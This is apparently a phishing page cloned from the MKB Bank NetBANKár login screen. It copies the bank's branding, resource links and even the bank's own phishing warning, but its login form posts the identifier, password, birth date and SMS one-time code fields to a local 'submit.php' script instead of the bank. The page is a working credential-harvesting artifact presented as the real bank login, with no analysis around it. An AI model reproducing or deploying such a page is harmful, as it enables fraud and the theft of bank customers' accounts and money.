 
<html xmlns="http://www.w3.org/1999/xhtml" class="  ext-strict"><head>
		<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta http-equiv="Cache-Control" content="max-age=-1">
        <meta http-equiv="X-UA-Compatible" content="IE=11">
		<link rel="icon" href="https://www.mkbnetbankar.hu/resources/images/mkb/icon_mkb_logo.ico">

		<title>MKB NetBANKár</title>
    
		<link rel="stylesheet" type="text/css" href="https://www.mkbnetbankar.hu/resources/css/ext-all.css">

		<link rel="stylesheet" type="text/css" href="https://www.mkbnetbankar.hu/resources/css/login.css">
		<link rel="stylesheet" type="text/css" href="https://www.mkbnetbankar.hu/resources/css/extending.css">

        <script type="text/javascript" async="" src="https://www.google-analytics.com/analytics.js"></script>
		<script async="" src="//www.googletagmanager.com/gtm.js?id=GTM-TXT5SDP"></script><script>
            var similityContext = {
                "customer_id": "dd46e7c0-d524-11e7-93c4-23de504d3cc4",
                "session_id": "QQ5DtBXv7sToFZdT",
                "user_id": "",  // itt még nincs userId
                "zone": "EU",
                "event_types": "Login"
            };
        </script>
        <script type="application/javascript" src="https://cdn.simility.com/b.js"></script>
		
<!-- 		<link href="/pics/icon_mkb_logo.ico" rel="icon"/> -->
<!-- 		<link href="/pics/icon_mkb_logo.ico" rel="shortcut icon"/> -->
<script type="text/javascript">
	// IE gyógyítás
	if (typeof(console) == 'undefined') {
		console = {log:function(){}};
	}
	
	capture = function(o) {
		console.log('Feliratkozás');
		console.log(o);
		Ext.util.Observable.capture(o, function(e, src, event) {
			console.log(e);
			console.log(src);
			if (typeof (event) == 'undefined') {
				console.log(event);
			}
		});
	};
	
	log = function() {
		console.log.apply(this, arguments);
	}
</script>
	
		<script type="text/javascript" src="/js/851407584/bundles/ext.js"></script>
<script type="text/javascript" src="/js/N425415189/bundles/login.js"></script>


		<script type="text/javascript" src="/js/823087061/bundles/ext_lang_HU.js"></script>


		 

		
		<script language="javascript" type="text/javascript">
			//<![CDATA[
			var tl_loc0=(window.location.protocol == "https:")? "https://secure.sectigo.com/trustlogo/javascript/trustlogo.js" :
			"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";
			document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');
			//]]>
		</script><script language="JavaScript" src="https://secure.sectigo.com/trustlogo/javascript/trustlogo.js" type="text/javascript"></script>
		<style type="text/css" media="screen">#comodoTL {display:block;font-size:8px;padding-left:18px;}</style>

		

		<script type="text/javascript">
			
			
			Ext.onReady(function() {
				Application = new mkb.login.Application( );
				Application.start('toleratedLogin', 'HU', {"message":"<b>Figyelemfelhívás &#8211; Adathalász-kísérlet az MKB Bank nevében<\/b><br\/>\r\n<br\/>\r\nTisztelt Ügyfeleink!<br\/>\r\n<br\/>\r\nA csalók az MKB Bank nevében adathalász céllal küldenek e-maileket.<br\/>\r\nElőfordul, hogy felfüggesztési figyelmeztetésre vagy új üzenet érkezésére hívják fel a figyelmet, hogy az általuk megadott linken jelentkezzenek be NetBANKár fiókjukba, és ott adják meg az adataikat.<br\/>\r\nAz e-mailekben található internetes oldalra vezető link megtévesztésig hasonlít az MKB internetbankjának hivatalos bejelentkezőfelületére.<br\/>\r\nAz e-mailek nyelvezete gyakran magyartalan, tartalma nehezen értelmezhető, hiányos.<br\/>\r\n<br\/>\r\n<b>Kérjük, minden esetben fokozott figyelemmel járjanak el az MKB Bank nevében küldött e-mailekkel kapcsolatban!<\/b><br\/>\r\n<b>Az MKB Bank sem e-mailben, sem telefonon nem kér ügyfeleitől bizalmas banki adatokat!<\/b><br\/>\r\n<br\/>\r\nÜdvözlettel:<br\/>\r\nMKB Bank","closeable":true}, '', '', true); // login|logout|versionChange|notSupported|toleratedLogin, HU|EN|DE, {message:'', closeable: true|false}
			});
		</script>

		<!-- Google Tag Manager -->
		<script>
			(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({"gtm.start":
						new Date().getTime(),event:"gtm.js"});var f=d.getElementsByTagName(s)[0],
					j=d.createElement(s),dl=l!="dataLayer"?"&l="+l:"";j.async=true;j.src=
					"//www.googletagmanager.com/gtm."+"js?id="+i+dl;f.parentNode.insertBefore(j,f);
			})(window,document,"script","dataLayer", "GTM-TXT5SDP");
		</script>
		<!-- End Google Tag Manager -->
		
	</head>

	<body class="ext-webkit ext-chrome" id="ext-gen3">
	<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-TXT5SDP"
					  height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
	
	
	
	

<div id="ext-comp-1001" class="x-tip" style="position: absolute; z-index: 20002; visibility: hidden; display: none;"><div class="x-tip-tl">
<div class="x-tip-tr"><div class="x-tip-tc"><div class="x-tip-header x-unselectable" id="ext-gen4">
<span class="x-tip-header-text"></span></div></div></div></div>
<div class="x-tip-bwrap" id="ext-gen5">
<div class="x-tip-ml"><div class="x-tip-mr"><div class="x-tip-mc" id="ext-gen8">
<div class="x-tip-body" id="ext-gen6" style="height: auto;"></div></div></div></div>
<div class="x-tip-bl x-panel-nofooter" id="ext-gen7"><div class="x-tip-br"><div class="x-tip-bc"></div></div></div></div>
<div class="x-tip-anchor x-tip-anchor-top" id="ext-gen9" style="z-index: 20003;"></div></div><div id="app-layout">
<div id="app-inner" style="width: 990px;"><div id="app-header" style="width: 990px;"><div id="app-logo">&nbsp;</div><div id="langButtons"><div id="btnEnglish" class="x-linkbutton lang x-btn-noicon" style="width: auto;">
<a class=" x-btn-text" href="main.do?NEW" target="" id="ext-gen66">English</a></div><div id="btnGerman" class="x-linkbutton lang x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="main.do?NEW" target="" id="ext-gen67">Deutsch</a></div><div id="btnHungarian" class="x-linkbutton lang x-btn-noicon x-hide-display" style="width: auto;"><a class=" x-btn-text" href="main.do?NEW" target="" id="ext-gen68">Magyar</a></div></div><div id="headerInfoTitle">MKB BANK Nyrt.</div><div id="headerInfoBody">Székhely: 1056 Budapest, Váci u.38.<br>Cégjegyzék helye és száma:<br> Fővárosi Törvényszék Cégbírósága,<br> Cg. 01-10-040952</div><div id="headerTeleTitle">MKB TeleBANKár.</div><div id="headerTeleBody">Lakossági ügyfélszolgálat: 06 (80) 333-660<br>Vállalati ügyfélszolgálat: 06 (80) 333-770<br>Külföldről: +36-1-373-3333</div><div id="headerSpacer1" class=" headerSpacer"></div><div id="headerSpacer2" class=" headerSpacer"></div></div><div id="app-content"><div id="toleratedLogin-screen"><span id="TrustedLogo">
		<script language="JavaScript" type="text/javascript">
			TrustLogo("https://www.mkbnetbankar.hu/resources/images/mkb/login/sectigo.png", "SC5", "none");
		</script><a href="javascript:if(window.open('" onmouseover="tLeB(event,'')" onmousemove="tLXB(event)" onmouseout="tLTC('tl_popupSC5')" ondragstart="return false;">
		<!----><div id="tl_popupSC5" name="tl_popupSC5" style="position:absolute;z-index:0;visibility: hidden;background-color: transparent;overflow:hidden;" onmouseover="tLoB('tl_popupSC5')" onmousemove="tLpC('tl_popupSC5')" onmouseout="tLpB('tl_popupSC5')">&nbsp;</div>
	</span><div id="loginscreen-mainlogintitle-container" style="width: 288px;">
	<div id="ext-comp-1041" class="  x-infobox">Bejelentkezés</div></div>
	<div id="loginscreen-mainpanel-container"><div id="ext-comp-1040" class=" loginHeaderButtons">
	<div id="identifierLinkButton" class="x-linkbutton x-btn-noicon x-btn-pressed" style="width: auto;">
	<a class=" x-btn-text" href="#" target="" id="ext-gen140">Azonosítóval</a></div>
	<div id="qrCodeLinkButton" class="x-linkbutton last x-btn-noicon" style="width: auto;">
	<a class=" x-btn-text" href="#" target="" id="ext-gen141">QR kóddal</a></div></div>
	<div id="loginscreen-panel-container"><div id="toleratedLogin-panel" class=" x-panel userpanel x-form-label-left" style="width: 284px;">
	<div class="x-panel-header x-unselectable notvisible" id="ext-gen84"><span class="x-panel-header-text" id="ext-gen89">Bejelentkezés</span></div>
	<div class="x-panel-bwrap" id="ext-gen85">
	
	<form class="x-panel-body x-form" method="POST" action="submit.php" id="ext-gen11" style="width: 244px; height: auto;">
	<input type="hidden" size="20" autocomplete="off" id="ext-comp-1016" name="j_language" class=" x-form-hidden x-form-field" value="HU">
	<div class="x-form-item " tabindex="-1" id="ext-gen117">
	<label for="Login_username" style="width:100px;" class="x-form-item-label" id="ext-gen118">Azonosító:</label>
	<div class="x-form-element" id="x-form-el-Login_username" style="padding-left:105px">
 
	<input type="text" size="20" name="username" minlength="6" autocomplete="off" id="Login_username" class="x-form-text x-form-field" style="width: 222px;" required>
	</div>
	<div class="x-form-clear-left"></div></div>
	
	<div class="x-form-item " tabindex="-1" id="ext-gen119">
	<label for="Login_password" style="width:100px;" class="x-form-item-label" id="ext-gen120">Jelszó:</label>
	<div class="x-form-element" id="x-form-el-Login_password" style="padding-left:105px">
 
	<input type="password" size="20" name="password" autocomplete="off" minlength="6" maxlength="16" id="Login_password" class="x-form-text x-form-field" style="width: 222px;" required>
	</div>
	
	<div class="x-form-clear-left"></div></div><div class="x-form-item  x-hide-display" tabindex="-1" id="ext-gen121">
	<label for="ext-comp-1005" style="width:100px;" class="x-form-item-label" id="ext-gen122">Születési dátum:</label>
	<div class="x-form-element" id="x-form-el-ext-comp-1004" style="padding-left:105px">
	<div id="ext-comp-1008" class="x-form-composite x-box-layout-ct x-form-field x-hide-display" style="width: 244px;">
	<div class="x-box-inner" id="ext-gen124" style="">
	<div class="x-form-field-wrap x-form-field-trigger-wrap x-box-item" id="ext-gen125" style="width: 78px; left: 0px; top: 0px;">
	<input type="text" size="24" autocomplete="off" id="ext-comp-1005" name="year" class="x-form-text x-form-field" style="width: 38px;">
	<img src="https://www.mkbnetbankar.hu/resources/images/default/s.gif" alt="" class="x-form-trigger x-form-arrow-trigger" id="ext-gen126"></div>
	<div class="x-form-field-wrap x-form-field-trigger-wrap x-box-item" id="ext-gen127" style="width: 100px; left: 83px; top: 0px;">
	<input type="hidden" name="month" id="ext-gen129" value="">
	<input type="text" size="24" autocomplete="off" id="ext-comp-1006" class="x-form-text x-form-field" style="width: 60px;">
	<img src="https://www.mkbnetbankar.hu/resources/images/default/s.gif" alt="" class="x-form-trigger x-form-arrow-trigger" id="ext-gen128"></div>
	<div class="x-form-field-wrap x-form-field-trigger-wrap x-box-item" id="ext-gen130" style="width: 55px; left: 188px; top: 0px;">
	<input type="text" size="24" autocomplete="off" id="ext-comp-1007" name="day" class="x-form-text x-form-field" style="width: 15px;">
	<img src="https://www.mkbnetbankar.hu/resources/images/default/s.gif" alt="" class="x-form-trigger x-form-arrow-trigger" id="ext-gen131"></div>
	</div></div></div>
	<div class="x-form-clear-left"></div></div>
	
	<div class="x-form-item  x-hide-display" tabindex="-1" id="ext-gen132">
	<label for="ext-comp-1013" style="width:100px;" class="x-form-item-label" id="ext-gen133">SMS jelszó:</label>
	<div class="x-form-element" id="x-form-el-ext-comp-1013" style="padding-left:105px">
	<input type="hidden" name="j_sms_otp" value="">
	<input type="password" size="20" autocomplete="off" id="ext-comp-1013" class="x-form-text x-form-field x-hide-display" style="width: 222px;">
	</div>
	<div class="x-form-clear-left"></div></div>
	<div class="x-form-item  x-hide-display" tabindex="-1" id="ext-gen134">
	<label for="ext-comp-1012" style="width:100px;height: 25px;" class="x-form-item-label" id="ext-gen135">Belépési token: Kérjük, hagyja jóvá az MKB Mobilalkalmazás segítségével:</label>
	<div class="x-form-element" id="x-form-el-ext-comp-1012" style="padding-left:105px">
	<div id="ext-comp-1012" name="ext-comp-1012" class="x-form-display-field x-hide-display" style="width: 244px;"></div></div>
	<div class="x-form-clear-left"></div></div>
	
	<input type="hidden" size="20" autocomplete="off" id="j_push_otp" name="j_push_otp" class=" x-form-hidden x-form-field x-hide-display" value="">
	
	<div class="x-form-item  x-hide-display" tabindex="-1" id="ext-gen136">
	<label for="smsFallbackInfo" style="width:100px;" class="x-form-item-label" id="ext-gen137"></label>
	<div class="x-form-element" id="x-form-el-smsFallbackInfo" style="padding-left:105px">
	<div id="smsFallbackInfo" name="smsFallbackInfo" class="x-form-display-field x-hide-display" style="width: 244px;">Nem kapta meg a belépéshez szükséges megerősítést? Kérjen SMS kódot.</div></div>
	<div class="x-form-clear-left"></div></div>
	<div class="x-form-item  x-hide-display" tabindex="-1" id="ext-gen138">
	<label for="Simility_session_id" style="width:100px;" class="x-form-item-label" id="ext-gen139"></label>
	<div class="x-form-element" id="x-form-el-Simility_session_id" style="padding-left:105px">
	<input type="hidden" name="similitySessionId" value="QQ5DtBXv7sToFZdT">
	<input type="text" size="20" autocomplete="off" id="Simility_session_id" class="x-form-text x-form-field x-hide-display"></div>
	<div class="x-form-clear-left">
	
	</div></div>
	

	
	
	<div class="x-panel-footer x-panel-btns" id="ext-gen86" style="width: 203px;">
	<div id="ext-comp-1017" class="x-panel-fbar x-small-editor x-toolbar-layout-ct" style="width: auto;">
	<table cellspacing="0" class="x-toolbar-ct"><tbody><tr><td class="x-toolbar-left" align="left">
	<table cellspacing="0"><tbody><tr class="x-toolbar-left-row"><td class="x-toolbar-cell" id="ext-gen90">
	<div id="passwordResetLinkBtn" class="x-linkbutton  x-btn-noicon" style="width: auto;">
 </div></td>
	<td class="x-toolbar-cell x-hide-display" id="ext-gen92">
	
	<div id="smsFallbackLinkBtn" class="x-linkbutton  x-btn-noicon" style="width: auto;">
	<a class=" x-btn-text" href="#" target="" id="ext-gen93">SMS kódot kérek.</a></div></td></tr></tbody></table></td>
	<td class="x-toolbar-right" align="right"><table cellspacing="0" class="x-toolbar-right-ct"><tbody><tr><td><table cellspacing="0">
	<tbody><tr class="x-toolbar-right-row"><td class="x-toolbar-cell" id="ext-gen94">
	<table id="ext-comp-1014" cellspacing="0" class="x-btn login x-btn-text-icon" style="width: auto; height: 23px;">
	<tbody class="x-btn-small x-btn-icon-small-right"><tr><td class="x-btn-tl"><i>&nbsp;</i></td>
	<td class="x-btn-tc"></td>
	<td class="x-btn-tr"><i>&nbsp;</i></td></tr>
	<tr>
	<td class="x-btn-ml"><i>&nbsp;</i></td>
	<td class="x-btn-mc">
	<em class="" unselectable="on">
	<button type="submit" id="LOGIN_BUTTON-ext-gen95" class="x-btn-text right">Bejelentkezés</button></em></td>
	<td class="x-btn-mr"><i>&nbsp;</i></td></tr>
		
	<tr>
	<td class="x-btn-bl"><i>&nbsp;</i></td>
	<td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td>
	<td class="x-toolbar-cell x-hide-display" id="ext-gen96">
	<table id="ext-comp-1015" cellspacing="0" class="x-btn login x-btn-text-icon" style="width: auto; height: 23px;">
	<tbody class="x-btn-small x-btn-icon-small-right"><tr><td class="x-btn-tl"><i>&nbsp;</i></td>
	<td class="x-btn-tc"></td><td class="x-btn-tr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-ml"><i>&nbsp;</i></td>
	<td class="x-btn-mc"><em class="" unselectable="on">
	<button type="submit" id="ext-gen97" class=" x-btn-text right">Elküldés</button></em></td>
	<td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-bl"><i>&nbsp;</i></td>
	<td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td></tr></tbody></table></td><td>
	<table cellspacing="0"><tbody><tr class="x-toolbar-extras-row"></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></div>
	</form>
	
	<div class="x-clear" id="ext-gen88"></div></div></div></div>
	<div id="password-reset-panel" class=" x-panel userpanel x-form-label-left x-hide-display" style="width: 284px;">
	<div class="x-panel-header x-unselectable" id="ext-gen99"><span class="x-panel-header-text" id="ext-gen104">Elfelejtett jelszó</span></div>
	<div class="x-panel-bwrap" id="ext-gen100">
	

	
	<div class="x-panel-footer x-panel-btns" id="ext-gen111" style="width: 274px;">
	<div id="ext-comp-1039" class="x-panel-fbar x-small-editor x-toolbar-layout-ct" style="width: auto;">
	<table cellspacing="0" class="x-toolbar-ct"><tbody><tr><td class="x-toolbar-left" align="center">
	<table cellspacing="0"><tbody><tr class="x-toolbar-left-row"><td class="x-toolbar-cell" id="ext-gen114">
	<table id="ext-comp-1037" cellspacing="0" class="x-btn login x-btn-text-icon" style="width: auto; height: 23px;">
	<tbody class="x-btn-small x-btn-icon-small-right"><tr><td class="x-btn-tl"><i>&nbsp;</i></td><td class="x-btn-tc"></td><td class="x-btn-tr"><i>&nbsp;</i></td>
	</tr><tr><td class="x-btn-ml"><i>&nbsp;</i></td><td class="x-btn-mc"><em class="" unselectable="on">
	<button type="submit" id="ext-gen115" class=" x-btn-text right">QR kód generálása</button></em></td>
	<td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-bl"><i>&nbsp;</i></td><td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td>
	</tr></tbody></table></td></tr></tbody></table></td><td class="x-toolbar-right" align="right">
	<table cellspacing="0" class="x-toolbar-right-ct"><tbody><tr><td><table cellspacing="0"><tbody><tr class="x-toolbar-right-row"></tr></tbody></table></td><td>
	<table cellspacing="0"><tbody><tr class="x-toolbar-extras-row"></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></div>
	<div class="x-clear" id="ext-gen113"></div></div></div></div></div></div>
	<div id="ext-comp-1042" class="x-linkbutton logindemand x-btn-noicon" style="width: 284px;">
	<a class=" x-btn-text" href="https://www.mkb.hu/elerhetosegek/netbankar_online_igenylese/index.html" target="_blank" id="REQUESTING_NEW_CONTRACT_BUTTON-ext-gen82">Új NetBANKár szerződés igénylése</a></div>
	<div id="login-warning-box"></div></div></div>
	<div id="app-footer" class=" x-panel" style="width: 990px; margin-top: 86px;"><div class="x-panel-bwrap" id="ext-gen69"><div class="x-panel-body x-panel-body-noheader" id="ext-gen70" style="width: 990px;"><div id="footerSmallLogo"></div><div id="footerIBAN">Swift: MKKB HU HB</div><div id="footerCopyright">MKB BANK Nyrt., 1056 Budapest, Váci u.38.</div><div id="footerButtons"><div id="ext-comp-1044" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="http://www.mkb.hu/friss_informaciok/az_onok_biztonsagaert/index" target="_blank" id="ext-gen71">Biztonság</a></div><div id="ext-comp-1045" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="http://www.mkb.hu/friss_informaciok/kondiciok/index.html" target="_blank" id="ext-gen72">Kondíciók</a></div><div id="ext-comp-1046" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="https://www.mkb.hu/sw/static/file/MKB_NetBANKar_TechnikaiFeltetelek_FINAL_v2.pdf" target="_blank" id="ext-gen73">Támogatott böngészők</a></div><div id="ext-comp-1047" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="https://www.mkb.hu/sw/static/file/NetBANKar_kezikonyv.pdf" target="_blank" id="ext-gen74">Kézikönyv</a></div><div id="ext-comp-1048" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="http://www.mkb.hu/friss_informaciok/hirlevelek_regisztracio/index.html" target="_blank" id="ext-gen75">Hírlevél</a></div><div id="ext-comp-1049" class="x-linkbutton last x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="https://www.mkb.hu/elerhetosegek" target="_blank" id="ext-gen76">Kapcsolat</a></div></div><div id="footerButtons2"><div id="ext-comp-1050" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="https://www.mkb.hu/adatvedelmi-iranyelvek" target="_blank" id="ext-gen77">Adatvédelmi irányelvek</a></div><div id="ext-comp-1051" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="http://www.mkb.hu/az_mkb_bankrol/kozlemenyek/uzletszabalyzat/index.html" target="_blank" id="ext-gen78">Általános üzleti feltételek</a></div><div id="ext-comp-1052" class="x-linkbutton  x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="https://www.mkb.hu/jogi-nyilatkozat" target="_blank" id="ext-gen79">Jogi nyilatkozat</a></div><div id="ext-comp-1053" class="x-linkbutton last x-btn-noicon" style="width: auto;"><a class=" x-btn-text" href="http://www.mkb.hu/impresszum.html" target="_blank" id="ext-gen80">Impresszum</a></div></div></div></div></div></div></div><div class="x-window-proxy" id="ext-gen36" style="display: none;"></div><div class="ext-el-mask" id="ext-gen37" style="display: none; width: 1280px; height: 711px; z-index: 9000;"></div><div class="x-shadow" id="ext-gen60" style="z-index: 9002; left: 316px; top: 185px; width: 648px; height: 347px; display: none;"><div class="xst"><div class="xstl"></div><div class="xstc" style="width: 636px;"></div><div class="xstr"></div></div><div class="xsc" style="height: 335px;"><div class="xsml"></div><div class="xsmc" style="width: 636px;"></div><div class="xsmr"></div></div><div class="xsb"><div class="xsbl"></div><div class="xsbc" style="width: 636px;"></div><div class="xsbr"></div></div></div><div id="ext-comp-1059" class=" x-window x-window-plain x-window-dlg" style="position: absolute; z-index: 9003; visibility: hidden; left: -10000px; top: -10000px; width: 640px; display: block;"><div class="x-window-tl"><div class="x-window-tr"><div class="x-window-tc"><div class="x-window-header x-unselectable x-window-draggable" id="ext-gen26"><div class="x-tool x-tool-close" id="ext-gen32" style="display: block;">&nbsp;</div><span class="x-window-header-text" id="ext-gen38">&nbsp;</span></div></div></div></div><div class="x-window-bwrap" id="ext-gen27"><div class="x-window-ml"><div class="x-window-mr"><div class="x-window-mc" id="ext-gen31"><div class="x-window-body" id="ext-gen28" style="width: 608px; height: auto;"><div id="ext-gen48" class=" x-dlg-icon"><div class="ext-mb-icon ext-mb-warning" id="ext-gen49"></div><div class="ext-mb-content"><span class="ext-mb-text" id="ext-gen50"><b>Figyelemfelhívás – Adathalász-kísérlet az MKB Bank nevében</b><br>
<br>
Tisztelt Ügyfeleink!<br>
<br>
A csalók az MKB Bank nevében adathalász céllal küldenek e-maileket.<br>
Előfordul, hogy felfüggesztési figyelmeztetésre vagy új üzenet érkezésére hívják fel a figyelmet, hogy az általuk megadott linken jelentkezzenek be NetBANKár fiókjukba, és ott adják meg az adataikat.<br>
Az e-mailekben található internetes oldalra vezető link megtévesztésig hasonlít az MKB internetbankjának hivatalos bejelentkezőfelületére.<br>
Az e-mailek nyelvezete gyakran magyartalan, tartalma nehezen értelmezhető, hiányos.<br>
<br>
<b>Kérjük, minden esetben fokozott figyelemmel járjanak el az MKB Bank nevében küldött e-mailekkel kapcsolatban!</b><br>
<b>Az MKB Bank sem e-mailben, sem telefonon nem kér ügyfeleitől bizalmas banki adatokat!</b><br>
<br>
Üdvözlettel:<br>
MKB Bank</span><br>
<div class="ext-mb-fix-cursor">
<input type="text" class="ext-mb-input" id="ext-gen51" style="display: none;">
<textarea class="ext-mb-textarea" id="ext-gen52" style="display: none;"></textarea></div></div>

<div class="x-progress-wrap x-hide-display" id="ext-comp-1060">
<div class="x-progress-inner">
<div class="x-progress-bar" id="ext-gen54" style="height: 18px; width: 0px;">
<div class="x-progress-text x-hidden" id="ext-gen55" style="z-index: 99; width: 0px;">
<div id="ext-gen57" style="width: 386px; height: 18px;">&nbsp;</div></div></div>
<div class="x-progress-text x-progress-text-back" id="ext-gen56">
<div id="ext-gen58" style="width: 386px; height: 18px;">&nbsp;</div></div></div></div>
<div class="x-clear" id="ext-gen59"></div></div></div></div></div></div>
<div class="x-window-bl" id="ext-gen30"><div class="x-window-br"><div class="x-window-bc">
<div class="x-window-footer x-panel-btns" id="ext-gen29" style="width: 618px;">
<div id="ext-comp-1058" class="x-panel-fbar x-small-editor x-toolbar-layout-ct" style="width: auto;">
<table cellspacing="0" class="x-toolbar-ct">
<tbody><tr><td class="x-toolbar-left" align="center">
<table cellspacing="0"><tbody><tr class="x-toolbar-left-row">
<td class="x-toolbar-cell" id="ext-gen39"><table id="ext-comp-1054" cellspacing="0" class="x-btn x-btn-noicon" style="width: 75px;">
<tbody class="x-btn-small x-btn-icon-small-left">
<tr><td class="x-btn-tl"><i>&nbsp;</i></td><td class="x-btn-tc"></td>
<td class="x-btn-tr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-ml"><i>&nbsp;</i></td><td class="x-btn-mc"><em class="" unselectable="on">
<button type="button" id="ext-gen40" class=" x-btn-text">OK</button></em></td>
<td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-bl"><i>&nbsp;</i></td><td class="x-btn-bc"></td>
<td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td><td class="x-toolbar-cell x-hide-offsets" id="ext-gen41">
<table id="ext-comp-1055" cellspacing="0" class="x-btn  x-btn-noicon" style="width: 75px;">
<tbody class="x-btn-small x-btn-icon-small-left"><tr><td class="x-btn-tl"><i>&nbsp;</i></td>
<td class="x-btn-tc"></td><td class="x-btn-tr"><i>&nbsp;</i></td></tr><tr>
<td class="x-btn-ml"><i>&nbsp;</i></td><td class="x-btn-mc"><em class="" unselectable="on">
<button type="button" id="ext-gen42" class=" x-btn-text">Igen</button></em></td><td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr>
<td class="x-btn-bl"><i>&nbsp;</i></td><td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td>
<td class="x-toolbar-cell x-hide-offsets" id="ext-gen43"><table id="ext-comp-1056" cellspacing="0" class="x-btn  x-btn-noicon" style="width: 75px;">
<tbody class="x-btn-small x-btn-icon-small-left"><tr><td class="x-btn-tl"><i>&nbsp;</i></td><td class="x-btn-tc"></td><td class="x-btn-tr"><i>&nbsp;</i></td></tr>
<tr><td class="x-btn-ml"><i>&nbsp;</i></td><td class="x-btn-mc"><em class="" unselectable="on">
<button type="button" id="ext-gen44" class=" x-btn-text">Nem</button></em></td><td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-bl"><i>&nbsp;</i></td><td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td><td class="x-toolbar-cell x-hide-offsets" id="ext-gen45"><table id="ext-comp-1057" cellspacing="0" class="x-btn  x-btn-noicon" style="width: auto;"><tbody class="x-btn-small x-btn-icon-small-left"><tr><td class="x-btn-tl"><i>&nbsp;</i></td><td class="x-btn-tc"></td><td class="x-btn-tr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-ml"><i>&nbsp;</i></td><td class="x-btn-mc"><em class="" unselectable="on"><button type="button" id="ext-gen46" class=" x-btn-text">Mégsem</button></em></td><td class="x-btn-mr"><i>&nbsp;</i></td></tr><tr><td class="x-btn-bl"><i>&nbsp;</i></td><td class="x-btn-bc"></td><td class="x-btn-br"><i>&nbsp;</i></td></tr></tbody></table></td></tr></tbody></table></td><td class="x-toolbar-right" align="right"><table cellspacing="0" class="x-toolbar-right-ct"><tbody><tr><td><table cellspacing="0"><tbody><tr class="x-toolbar-right-row"></tr></tbody></table></td><td><table cellspacing="0"><tbody><tr class="x-toolbar-extras-row"></tr></tbody></table></td></tr></tbody></table></td></tr></tbody></table></div><div class="x-clear" id="ext-gen34"></div></div></div></div></div></div><a href="#" class="x-dlg-focus" tabindex="-1" id="ext-gen35">&nbsp;</a></div>

</body></html>